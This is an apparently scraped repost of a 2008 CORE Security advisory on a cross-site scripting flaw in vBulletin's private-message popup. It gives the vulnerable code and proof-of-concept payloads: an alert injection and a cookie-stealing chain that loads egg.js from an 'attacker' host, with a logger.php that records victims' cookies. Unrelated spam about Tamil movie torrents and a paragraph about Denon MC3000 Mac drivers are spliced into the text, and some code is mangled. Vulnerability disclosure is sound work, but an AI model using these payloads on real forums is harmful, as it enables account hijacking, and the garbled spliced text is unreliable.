Search across all product documentation or browse through a library of documents for all McAfee products.

Summary

‘vBulletin [1] is a community forum solution for a wide range of users, including industry leading companies. A XSS vulnerability has been discovered that could allow an attacker to carry out an action impersonating a legal user, or to obtain access to a user’s account. This flaw allows unauthorized disclosure and modification of information, and it allows disruption of service.’

Credit:

‘The information has been provided by CORE Security Technologies Advisories.
The original article can be found at: http://www.coresecurity.com/content/vbulletin-cross-site-scripting-vulnerability‘

Details

‘Vulnerable Systems:
* vBulletin version 3.7.2 Patch Level 1.
* vBulletin 3.6.10 Patch Level 3.

Immune Systems:
* vBulletin version 3.7.2 Patch Level 2.
* vBulletin version 3.6.10 Patch Level 4.

Vendor Information, Solutions and Workarounds:
vBulletin team has released patches for this flaw (see [2]), and new fixed versions of vBulletin (3.6.11 and 3.7.3) will be available on Tuesday, August 26th. Refer to [3] for more details.

Technical Description / Proof of Concept Code:
This is a Cross Site Scripting (XSS) vulnerability within vBulletin community forum solution. In order to exploit this flaw the following option needs to be activated:
‘http://victim/vBulletin/profile.php?do=editoptions’ (Show New Private Message Notification Pop-Up enabled). There are many forums with this option enabled by default for all new users.

The title is not being encoded in the following rendered HTML code:

/———–

<!–
// script to show new private message popup
if (confirm(‘You have a new private message.nnSender:
[SENDER_USERNAME]nTitle: ‘[PRIVATE_MESSAGE_TITLE]’nnClick OK to view
it, or cancel to hide this prompt.’))
{
// Output when OK is clicked
if (confirm(‘Open the message in a new window?nn(Press cancel to open in the current window.)’))
{
var winobj = window.open(‘private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]’, ‘pmnew’, ‘statusbar=yes,menubar=yes,scrollbars=yes,toolbar=yes,location=yes,directories=yes,resizable=yes,top=50,left=50’);
if (winobj null)
{
alert(‘Unable to open a new browser window,n This might be due to a ‘popup blocker”);
}
}
else
{
window.location = ‘private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]’;
}
}
// end pm popup script
//–>

———–/

The variable ‘$newpm[title]’ in ‘install/vbulletin-style.xml’ was previously de-sanitized in ‘global.php’ and only slash-escaping survives:

/———–

//
#################################
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo[‘pmpopup’] 2 AND
$vbulletin->options[‘checknewpm’] AND $vbulletin->userinfo[‘userid’] AND
!defined(‘NOPMPOPUP’))
{
$userdm =& datamanager_init(‘User’, $vbulletin, ERRTYPE_SILENT);
$userdm->set_existing($vbulletin->userinfo);
$userdm->set(‘pmpopup’, 1);
$userdm->save(true, ‘pmpopup’); // ‘pmpopup’ tells db_update to issue a shutdownquery of the same name
unset($userdm);

if (THIS_SCRIPT != ‘private’ AND THIS_SCRIPT != ‘login’)
{
$newpm = $db->query_first(‘
SELECT pm.pmid, title, fromusername
FROM ‘ . TABLE_PREFIX . ‘pmtext AS pmtext
LEFT JOIN ‘ . TABLE_PREFIX . ‘pm AS pm USING(pmtextid)
WHERE pm.userid = ‘ . $vbulletin->userinfo[‘userid’] . ‘
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1’);

$newpm[‘username’] = addslashes_js(unhtmlspecialchars($newpm[‘fromusername’], true), ”’);
$newpm[‘title’] = addslashes_js(unhtmlspecialchars($newpm[‘title’], true), ”’);
$shownewpm = true;
}
}

———–/

Torrent file for tamil dubbed hollywood movies 2019. Which of course allows XSS attacks.

The ‘alert’ Proof of Concept (PoC) exploit would be to write a PM to the user you want to attack with this subject:

/———–

–></script><script>alert(/xss/.source)</script><!–
———–/

The admin impersonification exploit PoC (Working on IE6 Only) would be:

/———–

–></script><script src=’http:’//attacker/vbStealer/egg.js></script><!–
———–/

Where the ‘egg.js’ script file is:

/———–

// XSS – Cookie stealing – vBulletin 3.7.2 PL1
//
// To bypass HttpOnly cookie restrictions – Works in IE 6 and lower

var XmlHttp = new ActiveXObject(‘Microsoft.XMLHTTP’);
XmlHttp.open(‘GET’,’http://victim/vbStealer/logger.php’,false);
XmlHttp.setRequestHeader(‘Host’,’attacker’);
XmlHttp.send();

———–/

and the ‘logger.php’ script file:

/———–

<?
// XSS – Cookie stealing – vBulletin 3.7.2 PL1

$all_cookies = ”;
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$all_cookies .= ‘$cookie_name=$cookie_value, ‘;
}
rtrim($all_cookies, ‘, ‘);
file_put_contents(‘iplog.txt’, ‘COOKIES: ‘.$all_cookies.’n’, FILE_APPEND);
?>

———–/

Report Timeline:
2008-08-14: Core Security Technologies notifies the vBulletin team of the vulnerability.
2008-08-14: The vBulletin team asks Core for a technical description of the vulnerability.
2008-08-14: Technical details sent to vBulletin team by Core.
2008-08-15: vBulletin notifies Core that a fix has been produced and will be available to the users on Monday, August 18th.
2008-08-18: vBulletin releases patches for this flaw to its customers.
2008-08-20: The advisory CORE-2008-0813 is published.

Hi Guys, I have recently had a Mac gifted to me and wanted to try it out with my Denon MC3000. As I understand, the Mac is not compatible with. Connect the MC-3000 to a USB port of your computer using the provided USB cable. Mac OSX: No drivers is required to be installed for Mac OSX computers. Need tractor apple mac drivers and maps for Denon MC3000 and M audio exponent please or has Tractor become usless on Mac book pro? As I understand, the Mac is not compatible with the ASIO driver? I plugged in my controller and opened up Traktor Pro 2 on the Macbook (El. Apple released Mac OS X 10.11 El Capitan on September 30, 2015. It's important to us that your work and creativity aren't interrupted. Stay tuned to this article.

References:
[1] http://www.vbulletin.com/
[2] http://members.vbulletin.com/patches.php
[3] http://www.vbulletin.com/forum/showthread.php?t=282133‘